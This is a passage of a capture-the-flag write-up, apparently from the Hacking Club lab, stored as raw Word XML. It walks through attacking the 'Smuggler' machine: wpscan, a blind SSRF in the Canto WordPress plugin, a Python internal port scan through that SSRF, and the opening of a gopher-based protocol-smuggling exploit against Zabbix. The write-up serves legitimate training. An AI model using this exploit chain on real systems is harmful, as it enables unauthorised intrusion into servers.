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w1hcz8xjrvf5" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">About Hacking Club</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Hacking Club is a platform to learn cybersecurity, an incredible resource if you don’t know where to start. In addition to vulnerable machines, you have access to classes and challenges to practice your skills and access to an exclusive community to play and challenge yourself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6gjyyfwyiu02" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The best part about </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking Club</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is that it is very hands-on. If you are new to hacking, give it a try.</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36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.le3alcaxdf4o" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>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8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This write-up refers to the Smuggler ENG machine.If you require support, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">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vdga8tljgg58" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Scan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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need to know which services are running in the background and which ports are open. So, we will use a tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap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0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717800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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403600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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Looking at the page source code, we find a domain name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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65400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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So we will need to map the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">address to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">domain </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name by adding a line to the hosts file, as illustrated in the image above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">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616200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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Since we know this is a CMS → (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), we can use the tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan</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2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WPScan </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a black-box testing software to scan for potential vulnerabilities in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">installations and their plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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wpscan --url http://smuggler.uhclabs/ -e ap --plugins-detection aggressive --api-token &lt;token&gt; -t 200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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running the tool, we discover a plugin vulnerable to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SSRF</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657600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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plugin is affected by blind SSRF issues through the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subdomain</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parameter in three files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="36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/includes/lib/tree.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="36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/includes/lib/detail.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="36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/includes/lib/get.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="36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/includes/lib/download.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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All requests to arbitrary domains/IPs are made using the HTTPS protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/49189</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Since the machine name is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Smuggler</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, this already gives us a clue about what this is about → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">protocol smuggling</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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create a Python script to perform an internal port scan, allowing us to identify which services are running locally.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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script below is time-based. If the response time is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt; 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we know that the service is running locally. Since this is protocol smuggling, we can test common ports for this type of attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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 will keep port 80 because we know it is running both locally and externally. Notice the response time it returns:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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import sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:jc w:val="both"/>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2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url_base = '{}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={}?'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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ports = [80,5432,6379,9000,10050,11212]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:jc w:val="both"/>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2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for port in ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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url = url_base.format(sys.argv[1], ('127.0.0.1:%d' % port))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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 = requests.get(url)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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print(r.elapsed.total_seconds(), url)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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running the script, we see one port that returned with time </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt; 1</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2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It is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zabbix</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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95500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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that we know this is protocol smuggling and we know which service is running, we can create an exploit to target it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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If you want to deeply understand how this attack works, see:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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exploit to target Zabbix was crafted manually because the Zabbix version is newer. There is a tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gopherus</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that generates payloads for Zabbix and other services, but it generates payloads for older Zabbix versions, which would not work here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Below is the exploit I used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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from http.server import HTTPServer, BaseHTTPRequestHandler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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import ssl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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import struct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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import urllib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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import base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:jc w:val="both"/>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3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def command(cmd):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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url = "gopher://127.0.0.1:10050/_"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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header = "ZBXD\x01"</w:t>
      </w:r>
    </w:p>
